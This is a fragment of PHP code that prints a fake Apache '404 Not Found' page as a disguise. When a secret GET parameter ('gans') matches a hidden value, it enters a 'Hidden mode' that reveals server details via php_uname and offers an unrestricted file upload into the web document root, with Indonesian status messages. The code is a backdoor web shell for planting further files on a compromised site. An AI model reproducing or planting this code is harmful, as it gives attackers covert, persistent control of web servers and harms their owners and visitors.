"; echo "

404 Not Found

"; echo "

The requested URL ".$zaen." was not found on this server.

"; echo "

Additionally, a 404 Not Found error was accountered while trying to use an ErrorDocument to handle the request.

"; echo ""; if($_GET['gans']==$purworejo){ echo "Hidden mode 404"; echo "
"; //server info echo "".php_uname()."
"; //dok root echo "
"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['idx_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "sukses upload -> $web/$files"; } else { echo "gagal upload di document root."; } } else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "sukses upload $files di folder ini"; } else { echo "gagal"; } } } } ?>